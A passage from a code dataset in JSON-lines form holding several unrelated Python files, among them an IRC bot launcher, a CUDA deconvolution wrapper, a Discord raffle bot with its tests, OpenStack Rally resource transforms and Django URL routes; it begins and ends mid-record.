Try python2.7 sopel')\n sys.exit(1)\nif sys.version_info.major == 3 and sys.version_info.minor < 3:\n stderr('Error: When running on Python 3, Python 3.3 is required.')\n sys.exit(1)\n\nimport os\nimport argparse\nimport signal\n\nfrom sopel.__init__ import run, __version__\nfrom sopel.config import Config, _create_config, ConfigurationError, _wizard\nimport sopel.tools as tools\n\nhomedir = os.path.join(os.path.expanduser('~'), '.sopel')\n\n\ndef enumerate_configs(extension='.cfg'):\n configfiles = []\n if os.path.isdir(homedir):\n sopel_dotdirfiles = os.listdir(homedir) # Preferred\n for item in sopel_dotdirfiles:\n if item.endswith(extension):\n configfiles.append(item)\n\n return configfiles\n\n\ndef find_config(name, extension='.cfg'):\n if os.path.isfile(name):\n return name\n configs = enumerate_configs(extension)\n if name in configs or name + extension in configs:\n if name + extension in configs:\n name = name + extension\n\n return os.path.join(homedir, name)\n\n\ndef main(argv=None):\n global homedir\n # Step One: Parse The Command Line\n try:\n parser = argparse.ArgumentParser(description='Sopel IRC Bot',\n usage='%(prog)s [options]')\n parser.add_argument('-c', '--config', metavar='filename',\n help='use a specific configuration file')\n parser.add_argument(\"-d\", '--fork', action=\"store_true\",\n dest=\"daemonize\", help=\"Daemonize sopel\")\n parser.add_argument(\"-q\", '--quit', action=\"store_true\", dest=\"quit\",\n help=\"Gracefully quit Sopel\")\n parser.add_argument(\"-k\", '--kill', action=\"store_true\", dest=\"kill\",\n help=\"Kill Sopel\")\n parser.add_argument(\"-l\", '--list', action=\"store_true\",\n dest=\"list_configs\",\n help=\"List all config files found\")\n parser.add_argument(\"-m\", '--migrate', action=\"store_true\",\n dest=\"migrate_configs\",\n help=\"Migrate config files to the new format\")\n parser.add_argument('--quiet', action=\"store_true\", dest=\"quiet\",\n help=\"Supress all output\")\n parser.add_argument('-w', '--configure-all', action='store_true',\n dest='wizard', help='Run the configuration wizard.')\n parser.add_argument('--configure-modules', action='store_true',\n dest='mod_wizard', help=(\n 'Run the configuration wizard, but only for the '\n 'module configuration options.'))\n parser.add_argument('-v', '--version', action=\"store_true\",\n dest=\"version\", help=\"Show version number and exit\")\n if argv:\n opts = parser.parse_args(argv)\n else:\n opts = parser.parse_args()\n\n # Step Two: \"Do not run as root\" checks.\n try:\n # Linux/Mac\n if os.getuid() == 0 or os.geteuid() == 0:\n stderr('Error: Do not run Sopel with root privileges.')\n sys.exit(1)\n except AttributeError:\n # Windows\n if os.environ.get(\"USERNAME\") == \"Administrator\":\n stderr('Error: Do not run Sopel as Administrator.')\n sys.exit(1)\n\n if opts.version:\n py_ver = '%s.%s.%s' % (sys.version_info.major,\n sys.version_info.minor,\n sys.version_info.micro)\n print('Sopel %s (running on python %s)' % (__version__, py_ver))\n print('http://sopel.chat/')\n return\n elif opts.wizard:\n _wizard('all', opts.config)\n return\n elif opts.mod_wizard:\n _wizard('mod', opts.config)\n return\n\n if opts.list_configs:\n configs = enumerate_configs()\n print('Config files in ~/.sopel:')\n if len(configs) is 0:\n print('\\tNone found')\n else:\n for config in configs:\n print('\\t%s' % config)\n print('-------------------------')\n return\n\n config_name = opts.config or 'default'\n\n configpath = find_config(config_name)\n if not os.path.isfile(configpath):\n 
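
# find_config (above in this record) resolves a name by checking, in order: an
# existing file path, then an entry in the config directory with or without the
# extension. The resolution logic on its own, with the directory made a
# parameter (in the record it is the module-level homedir):

import os

def resolve_config(name, confdir, extension=".cfg"):
    if os.path.isfile(name):
        return name
    entries = os.listdir(confdir) if os.path.isdir(confdir) else []
    if name + extension in entries:
        name += extension
    return os.path.join(confdir, name)
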
print(\"Welcome to Sopel!\\nI can't seem to find the configuration file, so let's generate it!\\n\")\n if not configpath.endswith('.cfg'):\n configpath = configpath + '.cfg'\n _create_config(configpath)\n configpath = find_config(config_name)\n try:\n config_module = Config(configpath)\n except ConfigurationError as e:\n stderr(e)\n sys.exit(2)\n\n if config_module.core.not_configured:\n stderr('Bot is not configured, can\\'t start')\n # exit with code 2 to prevent auto restart on fail by systemd\n sys.exit(2)\n\n logfile = os.path.os.path.join(config_module.core.logdir, 'stdio.log')\n\n config_module._is_daemonized = opts.daemonize\n\n sys.stderr = tools.OutputRedirect(logfile, True, opts.quiet)\n sys.stdout = tools.OutputRedirect(logfile, False, opts.quiet)\n\n # Handle --quit, --kill and saving the PID to file\n pid_dir = config_module.core.pid_dir\n if opts.config is None:\n pid_file_path = os.path.join(pid_dir, 'sopel.pid')\n else:\n basename = os.path.basename(opts.config)\n if basename.endswith('.cfg'):\n basename = basename[:-4]\n pid_file_path = os.path.join(pid_dir, 'sopel-%s.pid' % basename)\n if os.path.isfile(pid_file_path):\n with open(pid_file_path, 'r') as pid_file:\n try:\n old_pid = int(pid_file.read())\n except ValueError:\n old_pid = None\n if old_pid is not None and tools.check_pid(old_pid):\n if not opts.quit and not opts.kill:\n stderr('There\\'s already a Sopel instance running with this config file')\n stderr('Try using the --quit or the --kill options')\n sys.exit(1)\n elif opts.kill:\n stderr('Killing the sopel')\n os.kill(old_pid, signal.SIGKILL)\n sys.exit(0)\n elif opts.quit:\n stderr('Signaling Sopel to stop gracefully')\n if hasattr(signal, 'SIGUSR1'):\n os.kill(old_pid, signal.SIGUSR1)\n else:\n os.kill(old_pid, signal.SIGTERM)\n sys.exit(0)\n elif opts.kill or opts.quit:\n stderr('Sopel is not running!')\n sys.exit(1)\n elif opts.quit or opts.kill:\n stderr('Sopel is not running!')\n sys.exit(1)\n if opts.daemonize:\n child_pid = os.fork()\n if child_pid is not 0:\n sys.exit()\n with open(pid_file_path, 'w') as pid_file:\n pid_file.write(str(os.getpid()))\n\n # Step Five: Initialise And Run sopel\n run(config_module, pid_file_path)\n except KeyboardInterrupt:\n print(\"\\n\\nInterrupted\")\n os._exit(1)\nif __name__ == '__main__':\n main()\n","sub_path":"sopel/run_script.py","file_name":"run_script.py","file_ext":"py","file_size_in_byte":7939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"146467721","text":"from .libcudawrapper import RLContext, rl_decon\nfrom .otf import TemporaryOTF\nimport os\nimport tifffile as tf\nfrom fnmatch import fnmatch\nimport numpy as np\n\n\ndef _yield_arrays(images, fpattern='*.tif'):\n \"\"\"Accepts a numpy array, a filepath, a directory, or a list of these\n and returns a generator that yields numpy arrays.\n\n fpattern argument is used to filter files in a directory\n \"\"\"\n if isinstance(images, np.ndarray):\n yield images\n\n elif isinstance(images, str):\n if os.path.isfile(images):\n yield tf.imread(images)\n\n elif os.path.isdir(images):\n imfiles = [f for f in os.listdir(images) if fnmatch(f, fpattern)]\n if not len(imfiles):\n raise IOError('No files matching pattern \"{}\" found in directory: {}'\n .format(fpattern, images))\n for fpath in imfiles:\n yield tf.imread(os.path.join(images, fpath))\n\n elif isinstance(images, (list, tuple)):\n for item in images:\n yield from _yield_arrays(item) # noqa\n\n\ndef decon(images, psf, fpattern='*.tif', **kwargs):\n 
\"\"\"Deconvolve an image or images with a PSF or OTF file\n\n If `images` is a directory, use the `fpattern` argument to select files\n by filename pattern.\n\n Args:\n images (str, np.ndarray, list, tuple): The array, filepath,\n directory, or list/tuple thereof to deconvolve\n psf (str, np.ndarray): a filepath of a PSF or OTF file, or a 3D numpy\n PSF array. Function will auto-detect whether the file is a 3D PSF\n or a filepath representing a 2D complex OTF.\n fpattern (str, optional): Defaults to '\\*.tif'. Filepattern to use when\n a directory is provided in the ``images`` argument\n ** kwargs: optional keyword arguments listed below\n ** dxdata (float): The xy pixel size of the ``image``. Defaults to 0.1\n ** dzdata (float): The z step size of the ``image``. Defaults to 0.5\n ** dxpsf (float): The xy pixel size of the ``psf``. Defaults to 0.1\n ** dzpsf (float): The z step size of the ``psf``. Defaults to 0.1\n ** background (int): Background to subtract. use 'auto' to subtract\n median val of last Z plane. Defaults to 80\n ** deskew (float): Angle to deskew data (for stage scanning acquisition).\n Defaults to 0\n ** pad_val (int): Value to pad edges with when deskewing. Should be\n zero when ``background`` is 'auto' Defaults to 0\n ** rotate (float): Degrees to rotate volume in Y axis (to make Z axis orthogonal to coverslip). Defaults to 0\n ** width (int): Width of output image (0 = full). Defaults to 0\n ** n_iters (int): Number of iterations in deconvolution Defaults to 10\n ** save_deskewed (bool): Save raw deskewed files (if deskew > 0). Defaults to False\n ** napodize (int): Number of pixels to soften edge with. Defaults to 15\n ** nz_blend (int): Number of top and bottom sections to blend in to reduce axial ringing. Defaults to 0\n ** dup_rev_z (bool): Duplicate reversed stack prior to decon to reduce axial ringing. Defaults to False\n ** wavelength (int): Wavelength in nanometers (for OTF cleanup). Defaults to 520\n ** fixorigin (int): For all kz, extrapolate using pixels kr=1 to this pixel to get value for kr=0. Defaults to 10\n ** otf_bgrd (None, int): Background to subtract in PSF (None = autodetect). Defaults to None\n ** na (float): Numerical aperture (for OTF cleanup). Defaults to 1.25]\n ** nimm (float): Refractive index of medium (for OTF cleanup). Defaults to 1.3\n ** krmax (int): Pixels outside this limit will be zeroed (overwriting estimated value from ``na`` and ``nimm``). Defaults to 0\n ** cleanup_otf (bool): Clean up OTF outside of OTF support. Defaults to False\n\n Raises:\n ValueError: If save_deskewed is True and deskew is unset or 0\n IOError: If a directory is provided as input and ``fpattern`` yields no files\n NotImplementedError: If ``psf`` is provided as a complex, 2D numpy array\n (OTFs can only be provided as filenames created with :func:`pycudadecon.make_otf`)\n\n Returns:\n np.ndarray, list: numpy array or list of arrays (deconvolved images)\n\n If the input ``images`` is a single array, or filepath, then the returned\n value will be a single 3D image volume.\n\n If the input is a directory or a list of arrays, then the returned value\n will be a list of 3D image volumes.\n\n if ``save_deskewed == True``, returns a tuple (decon, deskewed) or a list\n of tuples (if input was iterable)\n\n Examples:\n\n deconvolve a 3D TIF volume with a 3D PSF volume (e.g. 
 Examples:

 deconvolve a 3D TIF volume with a 3D PSF volume (e.g. a single bead stack)

 >>> impath = '/path/to/image.tif'
 >>> psfpath = '/path/to/psf.tif'
 >>> result = decon(impath, psfpath)

 deconvolve all TIF files in a specific directory that match a certain
 filename pattern (in this example, all TIFs with the string '560nm' in
 their name)

 >>> imdirectory = '/directory/with/images'
 >>> psfpath = '/path/to/psf.tif'
 >>> result = decon(imdirectory, psfpath, fpattern='*560nm*.tif')

 deconvolve a list of images, provided either as np.ndarrays, filepaths,
 or directories

 >>> imdirectory = '/directory/with/images'
 >>> impath = '/path/to/image.tif'
 >>> imarray = tifffile.imread('some_other_image.tif')
 >>> psfpath = '/path/to/psf.tif'
 >>> result = decon([imdirectory, impath, imarray],
 ... psfpath, fpattern='*560nm*.tif')
 """
 if kwargs.get('save_deskewed'):
 # a deskewed copy only exists when the data are actually deskewed
 if kwargs.get('deskew', 0) == 0:
 raise ValueError('Must set deskew != 0 when using save_deskewed=True')

 out = []
 with TemporaryOTF(psf, **kwargs) as otf:
 arraygen = _yield_arrays(images)
 # first, assume that all of the images are the same shape...
 # in which case we can prevent a lot of GPU IO
 # grab and store the shape of the first item in the generator
 next_im = next(arraygen)
 shp = next_im.shape

 with RLContext(shp, otf.path, **kwargs) as ctx:
 while True:
 out.append(rl_decon(next_im, output_shape=ctx.out_shape, **kwargs))
 try:
 next_im = next(arraygen)
 # here we check to make sure that the images are still the same
 # shape... if not, we'll continue below
 if next_im.shape != shp:
 break
 except StopIteration:
 next_im = None
 break

 # if we had a shape mismatch, there will still be images left to process
 # process them the slow way here...
 if next_im is not None:
 for imarray in [next_im, *arraygen]:
 with RLContext(imarray.shape, otf.path, **kwargs) as ctx:
 out.append(rl_decon(imarray, output_shape=ctx.out_shape, **kwargs))

 if isinstance(images, (list, tuple)) and len(images) > 1:
 return out
 else:
 return out[0]
","sub_path":"pycudadecon/deconvolution.py","file_name":"deconvolution.py","file_ext":"py","file_size_in_byte":7440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
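One return-shape detail in the docstring above is easy to miss: with save_deskewed=True each result becomes a (deconvolved, deskewed) pair. A short usage sketch, assuming the package re-exports decon at the top level as the docstring examples imply (the paths and deskew angle are placeholders):

from pycudadecon import decon

result = decon('/path/to/image.tif', '/path/to/psf.tif',
               deskew=31.5, save_deskewed=True)
# a single input yields one (decon, deskewed) tuple; iterable inputs yield a list of tuples
deconvolved, deskewed = result
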
{"seq_id":"43551730","text":"

#class header
class _LEAD():
 def __init__(self):
 self.name = "LEAD"
 self.definitions = [u'used to describe the main performer or part in a performance: ']

 self.parents = []
 self.childen = []
 self.properties = []
 self.jsondata = {}


 self.specie = 'adjectives'


 def run(self, obj1, obj2):
 self.jsondata[obj2] = {}
 self.jsondata[obj2]['properties'] = self.name.lower()
 return self.jsondata
","sub_path":"xai/brain/wordbase/adjectives/_lead.py","file_name":"_lead.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"524233160","text":"import numpy as np
import cvxpy as cp

ETA = 0.9
N_IAAS = 20
N_SERVICE = 10
R = (np.random.randint(low=7, high=10, size=N_SERVICE)*100)
F = np.random.uniform(low=0.5, high=1.5, size=N_SERVICE)
CHOICE = np.random.randint(low=0, high=2, size=(N_IAAS, N_SERVICE), dtype=bool)
I = []
C = [4000] * N_IAAS
U = np.random.uniform(low=0.3, high=0.4, size=N_IAAS)
tau = np.random.uniform(low=0.01, high=1, size=(N_IAAS, N_SERVICE))
IS = np.zeros((N_IAAS, N_SERVICE), dtype=bool)

for s in range(N_SERVICE):
 new = []
 for i in range(N_IAAS):
 if CHOICE[i,s]:
 new.append(i)
 I.append(new)
r = cp.Variable((N_IAAS, N_SERVICE))
u = cp.Variable((N_IAAS, N_SERVICE))
d = cp.Variable((N_IAAS, N_SERVICE))
rTotal = cp.Variable(N_SERVICE)
dMax = cp.Variable(N_SERVICE)

obj = 0
constraints = [ 0 <= r, 0 <= u, 0 <= dMax]
for s in range(N_SERVICE):
 if I[s]:
 rates = None
 for i in I[s]:
 IS[i, s] = True
 if rates is None:  # explicit None check; don't truth-test a CVXPY expression
 rates = r[i,s]
 else:
 rates += r[i,s]
 constraints.append(r[i,s] <= ETA*u[i,s]*U[i]*C[i]/F[s])
 # log-barrier form of (u*U*C/F - r)*(d - tau) >= 1, i.e. an M/M/1-style
 # delay bound d >= tau + 1/(capacity - rate), kept DCP-compliant via -log
 constraints.append(-cp.log(u[i,s]*U[i]*C[i]/F[s]-r[i,s]) - cp.log(d[i,s]-tau[i,s]) <= 0)
 constraints.append(d[i,s] <= dMax[s])
 constraints.append(rTotal[s] == rates)
 serviceObj = (cp.abs(rTotal[s]-R[s])) + 1e2*dMax[s]
 obj += serviceObj
 else:
 obj += R[s]
for i in range(N_IAAS):
 if IS[i,:].any():
 constraints.append(cp.sum(u[i,IS[i,:]]) <= 1)
objective = cp.Minimize(obj)
prob = cp.Problem(objective, constraints)
print(prob)
result = prob.solve(solver="ECOS", verbose=True)
print(prob.status)
print("value:", prob.value)
print("r:", r.value)
print("u:", u.value)
print("d:", d.value)
print("D:", dMax.value)
print("rT:", rTotal.value)
print("R:", R)
","sub_path":"7/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"629363736","text":"# // -- imports to make the bot work on discord -- //
import discord
from discord.ext import commands
import asyncio
# // -- import for database -- //
import sqlite3
# // -- import for random decisions -- //
import random
# // -- import the commonly used methods -- //
import Util

class Raffle(commands.Cog):
 def __init__(self,bot):
 self.bot = bot

 def make_total_raffle(self):
 total_raffle = list(Util.RAFFLE)
 for user in Util.DB_RAFFLE:
 total_raffle.append(user[0])
 return total_raffle

 def make_total_points(self,id):
 total_point = dict(Util.POINT)
 for user in Util.DB_POINT:
 if user[0] in total_point:
 total_point[user[0]] += user[1]
 else:
 total_point[user[0]] = user[1]
 if id not in total_point:
 total_point[id] = 0
 return total_point

 @commands.command(name = 'clear_raffle')
 @Util.is_admin()
 async def clear_raffle(self, ctx,*, content = ''):
 await Util.log_command(self.bot,ctx,"clear_raffle")
 conn = sqlite3.connect('Database.db')
 c = conn.cursor()
 c.execute("DROP TABLE raffle_table;")
 conn.commit()
 sql_cmd = open("SQL_CMDS/c-raffle_table.txt",'r').read()
 c.execute(sql_cmd)
 conn.commit()
 c.execute("SELECT user_ID FROM raffle_table;")
 Util.DB_RAFFLE = c.fetchall()
 conn.close()
 Util.RAFFLE = []
 await ctx.send("The database has been reset")

 @commands.command(name = 'raffle_begins',
 aliases = ['raffle_begin'])
 @Util.is_admin()
 async def raffle_begins(self, ctx,*, content = ''):
 await Util.log_command(self.bot,ctx,"raffle_begins")
 if content == '':
 await ctx.send("{} Please Make Sure To Give A Description Over The Winning Item".format(ctx.author))
 return
 chnl = self.bot.get_channel(Util.RAFFLE_CHNL)
 embed = discord.Embed(title = "React To This Message To Enter Into The Raffle!",
 description = "{}``` ```Each Ticket Entry Costs 3 Points, And You Are Allowed Up To 5 Entries!".format(content),
 colour = random.randint(0,0xffffff)
 )
 embed.set_author(name = ctx.message.author, icon_url = ctx.message.author.avatar_url)
 msg 
= await chnl.send(embed = embed)\n await msg.add_reaction(\"\\U0001F39F\")\n await msg.pin()\n\n @commands.command(name = 'winner')\n @Util.is_admin()\n async def winner(self, ctx,*, content = ''):\n await Util.log_command(self.bot,ctx,\"winner\")\n total_raffle = self.make_total_raffle()\n chnl = self.bot.get_channel(Util.RAFFLE_CHNL)\n async for message in chnl.history(limit = 10):\n await message.clear_reactions()\n while True:\n try:\n win = total_raffle[random.randint(0,len(total_raffle)-1)]\n member = await ctx.guild.fetch_member(win)\n break\n except:\n continue\n embed = discord.Embed(title = \"The Raffle Is Done!\",\n description = \"{} is the winner of the raffle!\".format(member.mention),\n colour = random.randint(0,0xffffff))\n await chnl.send(embed = embed)\n\n @commands.Cog.listener()\n async def on_raw_reaction_add(self, payload):\n if not Util.is_raffle_chnl(payload):\n return\n if payload.user_id == self.bot.user.id:\n return\n await self.bot.http.remove_reaction(payload.channel_id, payload.message_id, payload.emoji, payload.user_id)\n\n total_raffle = self.make_total_raffle()\n total_point = self.make_total_points(payload.user_id)\n if total_raffle.count(payload.user_id) >= 5:\n return\n if total_point[payload.user_id] < 3:\n return\n\n if payload.user_id in Util.POINT:\n Util.POINT[payload.user_id] -= 3\n else:\n Util.POINT[payload.user_id] = (-1 * 3)\n\n chnl = self.bot.get_guild(433695004645523456).get_channel(Util.RAFFLE_CHNL)\n mylist = []\n async for msg in chnl.history(limit = 10):\n mylist.append(msg)\n mylist.pop(-1)\n if len(mylist) > 0:\n await chnl.delete_messages(mylist)\n total_raffle.append(payload.user_id)\n Util.RAFFLE.append(payload.user_id)\n emsg = ''\n overflow = 0\n color = random.randint(0,0xffffff)\n for i in total_raffle:\n try:\n user = await self.bot.get_guild(433695004645523456).fetch_member(i)\n except:\n continue\n emsg += ' ' + user.mention\n overflow += 1\n if overflow == 30:\n embed = discord.Embed(title = 'All The Tickets In The Hat!',\n description = emsg,\n colour = color\n )\n await chnl.send(embed = embed)\n emsg = ''\n overflow = 0\n if emsg != '':\n embed = discord.Embed(title = 'All The Tickets In The Hat!',\n description = emsg,\n colour = color\n )\n await chnl.send(embed = embed)\n\n\n\ndef setup(bot):\n bot.add_cog(Raffle(bot))\n","sub_path":"Raffle.py","file_name":"Raffle.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"294383234","text":"# Copyright (C) 2014 Yahoo! Inc. All Rights Reserved.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the
# License for the specific language governing permissions and limitations
# under the License.

import abc
import operator
import re

from rally import exceptions


# NB: within this module the decorator shadows the builtin set()
def set(**kwargs):
 """Decorator to define resource transformation(s) on scenario parameters.

 The `kwargs` passed as arguments to the decorator are used to
 map a key in the scenario config to the subclass of ResourceType
 used to perform a transformation on the value of that key.
 """
 def wrapper(func):
 func.preprocessors = getattr(func, 'preprocessors', {})
 func.preprocessors.update(kwargs)
 return func
 return wrapper
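In practice the decorator is stacked onto a scenario method, one keyword per config key to transform. A hedged sketch of that usage (the function and config keys are invented for illustration; only the preprocessors bookkeeping comes from the code above):

from rally.benchmark import types

@types.set(image=types.ImageResourceType,
           flavor=types.FlavorResourceType)
def boot_server(image, flavor, **kwargs):
    """By the time the runner invokes this, 'image' and 'flavor' have been
    resolved from config dicts into concrete IDs."""

# the decorator only records the mapping; transformation happens later
print(boot_server.preprocessors)
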
class ResourceType(object):

 @classmethod
 @abc.abstractmethod
 def transform(cls, clients, resource_config):
 """Transform the resource.

 :param clients: openstack admin client handles
 :param resource_config: scenario config of resource

 :returns: transformed value of resource
 """


def _id_from_name(resource_config, resources, typename):
 """Return the id of the resource whose name matches the pattern.

 When resource_config contains `name`, an exact match is used.
 When resource_config contains `regex`, a pattern match is used.

 An `InvalidScenarioArgument` is thrown if the pattern does
 not match unambiguously.

 :param resource_config: resource to be transformed
 :param resources: iterable containing all resources
 :param typename: name which describes the type of resource

 :returns: resource id uniquely mapped to `name` or `regex`
 """
 if resource_config.get('name'):
 patternstr = "^{0}$".format(resource_config.get('name'))
 elif resource_config.get('regex'):
 patternstr = resource_config.get('regex')
 else:
 raise exceptions.InvalidScenarioArgument(
 "{typename} 'id', 'name', or 'regex' not found "
 "in '{resource_config}' ".format(typename=typename.title(),
 resource_config=resource_config))

 pattern = re.compile(patternstr)
 # materialize the filter so len() and indexing also work on Python 3
 matching = list(filter(lambda resource: re.search(pattern, resource.name),
 resources))
 if not matching:
 raise exceptions.InvalidScenarioArgument(
 "{typename} with pattern '{pattern}' not found".format(
 typename=typename.title(), pattern=pattern.pattern))
 elif len(matching) > 1:
 raise exceptions.InvalidScenarioArgument(
 "{typename} with name '{pattern}' is ambiguous, possible matches "
 "by id: {ids}".format(typename=typename.title(),
 pattern=pattern.pattern,
 ids=", ".join(map(operator.attrgetter("id"),
 matching))))
 return matching[0].id


class FlavorResourceType(ResourceType):

 @classmethod
 def transform(cls, clients, resource_config):
 """Transform the resource config to id.

 :param clients: openstack admin client handles
 :param resource_config: scenario config with `id`, `name` or `regex`

 :returns: id matching resource
 """
 resource_id = resource_config.get('id')
 if not resource_id:
 novaclient = clients.nova()
 resource_id = _id_from_name(resource_config=resource_config,
 resources=novaclient.flavors.list(),
 typename='flavor')
 return resource_id


class ImageResourceType(ResourceType):

 @classmethod
 def transform(cls, clients, resource_config):
 """Transform the resource config to id.

 :param clients: openstack admin client handles
 :param resource_config: scenario config with `id`, `name` or `regex`

 :returns: id matching resource
 """
 resource_id = resource_config.get('id')
 if not resource_id:
 glanceclient = clients.glance()
 resource_id = _id_from_name(resource_config=resource_config,
 resources=glanceclient.images.list(),
 typename='image')
 return resource_id
","sub_path":"rally/benchmark/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
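The name/regex contract in _id_from_name gives scenario configs two ways to point at a resource, both resolved through the transform methods above. Illustrative config fragments (the values are made up):

flavor_config = {'name': 'm1.small'}       # exact match: compiled as ^m1.small$
image_config = {'regex': '^cirros.*uec$'}  # pattern match against resource names
# zero matches, or more than one, raise InvalidScenarioArgument as coded above
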
{"seq_id":"37949761","text":""""
 Tests Regrade
"""

from time import sleep
import discord


async def test(testing_bot, guild_id):

 """
 Function: test
 Description: runs each test
 Inputs:
 - testing_bot: bot that sends commands to test TeachersPetBot
 - guild_id: id of the guild that is using the TeachersPetBot
 Outputs: None
 """
 await test_regrade_request(testing_bot)
 await test_update_request(testing_bot)
 await test_display_requests(testing_bot)
 await test_remove_request(testing_bot)


async def test_regrade_request(testing_bot):

 """
 Function: test_regrade_request
 Description: tests regrade-request command
 Inputs:
 - testing_bot: bot that sends commands to test TeachersPetBot
 Outputs: None
 """

 print('testing regrade request')
 regrade_channel = discord.utils.get(testing_bot.get_all_channels(), name='regrade-requests')
 await regrade_channel.send('!regrade-request "Student 1" q1,q2,q3')
 sleep(5.0)
 messages = await regrade_channel.history(limit=1).flatten()

 for m in messages:
 new_request = "STUDENT 1's regrade request successfully submitted" in m.content
 duplicate_request = "Duplicate regrade request.Use !regrade-update command to make updates to request" in m.content
 assert (new_request or duplicate_request)


async def test_update_request(testing_bot):

 """
 Function: test_update_request
 Description: tests update-request command
 Inputs:
 - testing_bot: bot that sends commands to test TeachersPetBot
 Outputs: None
 """
 print('testing update request')
 regrade_channel = discord.utils.get(testing_bot.get_all_channels(), name='regrade-requests')
 await regrade_channel.send('!update-request "Student 1" q4,q5,q6')
 sleep(5.0)
 messages = await regrade_channel.history(limit=1).flatten()

 for m in messages:
 assert "STUDENT 1's regrade request updated successfully" in m.content


async def test_display_requests(testing_bot):

 """
 Function: test_display_requests
 Description: tests display-requests command
 Inputs:
 - testing_bot: bot that sends commands to test TeachersPetBot
 Outputs: None
 """
 print('testing display requests')
 regrade_channel = discord.utils.get(testing_bot.get_all_channels(), name='regrade-requests')
 await regrade_channel.send('!display-requests')
 sleep(5.0)
 messages = await regrade_channel.history(limit=1).flatten()

 for m in messages:
 assert 'STUDENT 1 q4,q5,q6' in m.content


async def test_remove_request(testing_bot):

 """
 Function: test_remove_request
 Description: tests remove-request command
 Inputs:
 - testing_bot: bot that sends commands to test TeachersPetBot
 Outputs: None
 """
 print('testing remove request')
 regrade_channel = discord.utils.get(testing_bot.get_all_channels(), name='regrade-requests')
 await regrade_channel.send('!remove-request "Student 1" q4,q5,q6')
 sleep(5.0)
 messages = await regrade_channel.history(limit=1).flatten()

 for m in messages:
 assert "STUDENT 1's regrade request removed successfully" in m.content
","sub_path":"test/test_regrade.py","file_name":"test_regrade.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"370810532","text":"from django.conf.urls import url

from info.filter import SkillFilter
from info.forms import LoginForm
from info.views import *
from django.contrib.auth import views

worker_url = [
 url(r'skill/create/$',SkillCreate.as_view(),name='createskill'),
 url(r'skill/$',SkillListView.as_view(),name='skillliist'),
 url(r'skill/delete/(?P<pk>\d+)/$',DeleteSkillView.as_view(),name='skilldelete'),
 url(r'skill/update/(?P<pk>\d+)/$',SkillUpdate.as_view(),name='skillupdate'),
 url(r'^workerprofile/$', CreateProfile.as_view(), name='workerprofile'),
]


urlpatterns = [

 url(r'^$', home, name='home'),
 url(r'^registeration/', register, name='register'),
 url(r'^activate/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',
 activate, name='activate'),
 url(r'^login/',loginuser, name='login'),
 url(r'^profile/$', GetProfile.as_view(),name = 'profile' ),
 url(r'^contractorprofile/$', CreateContractorProfile.as_view(), name='contractorprofile'),
 url(r'^aboutus/',aboutus, name='aboutus'),
 url(r'^contactus/',contactus, name='contactus'),
 url(r'^logout/$',views.logout, {'next_page': '/login'},name='logout'),
 url(r'worker-hire/$',WorkerSkillListView.as_view(),name='worker_skill_list'),
 url(r'^worker-hire/(?P<pk>\d+)/$',HireWorkerView.as_view(),name='worker_hire'),
 url(r'^hired-request/', HireRequestList.as_view(),name='hired_request'),
 url(r'^confirm-hire/(?P<pk>\d+)/$',confirm_hire_worker, name='confirm-hire'),


] + worker_url
","sub_path":"info/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"318027269","text":"# -*- coding: utf-8 -*-
"""
Created on Thu Jul 16 11:09:58 2020

@author: YingliLou
"""
import numpy as np
import csv

climate = ['1A','2A','2B','3A','3B','3C','4A','4B','4C','5A','5B','6A','6B','7A','8A']
sensitivity=['fa','mo','SA_GAM_','SA_LIN_REG_','SA_RP_REG_','SA_RS_REG_','so']
num_var=11

sensitivity_results=[]
for i in range (len(climate)): #len(climate)
 results1=[]
 results2=[]
 for j in range (len(sensitivity)): #len(sensitivity)
 data_set_temp = np.genfromtxt('./results/sensitive/sensitivity_'+sensitivity[j]+'.csv',dtype=str,delimiter=',')
 var=[None]*num_var
 temp=[]
 for row in data_set_temp:
 if row[0] == climate[i]:
 temp.append(float(row[3])) #rank numerically, not lexicographically
 sensitive_value=1
 temp=np.array(temp)
 temp=np.argsort(temp)
 value=1
 for k in range(num_var):
 var[temp[k]]=value
 value +=1
 results1.append(var)
 for j in range (num_var):
 temp=0
 for k in range(len(sensitivity)):
 temp += float(results1[k][j])
 temp=temp/len(sensitivity)
 results2.append(temp)
 sensitivity_results.append(results2)

sensitivity_results=tuple(zip(*sensitivity_results))

with open('./sensitivity_results.csv', 'w', newline='') as csvfile:
 data = csv.writer(csvfile, delimiter=',')
 for row in sensitivity_results:
 data.writerow(row)
","sub_path":"sensitivity.py","file_name":"sensitivity.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"445000092","text":"#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Script Header

$Id: 
